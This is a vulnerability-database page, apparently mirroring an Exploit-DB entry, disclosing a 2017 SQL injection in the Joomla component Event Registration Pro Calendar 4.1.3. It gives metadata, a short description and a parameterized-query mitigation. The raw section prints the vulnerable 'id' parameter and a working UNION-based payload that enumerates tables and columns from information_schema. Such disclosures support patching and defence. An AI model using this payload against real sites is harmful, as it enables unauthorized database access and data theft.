header-logo
Suggest Exploit
vendor:
Event Registration Pro Calendar
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Event Registration Pro Calendar
Affected Version From: 4.1.3
Affected Version To: 4.1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlashowroom:event_registration_pro_calendar:4.1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Joomla! Component Event Registration Pro Calendar v4.1.3 – SQL Injection

An attacker can exploit a SQL injection vulnerability in Joomla! Component Event Registration Pro Calendar v4.1.3 by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, or execute system level commands.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This will ensure that user-supplied input is treated as a string value instead of as part of the SQL query.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://joomlashowroom.com/
# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
# Demo: http://demo3.joomlashowroom.com/
# Version: 4.1.3
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
# Etc..
# # # # #

Navigation

Suggest Exploit

Services By CQR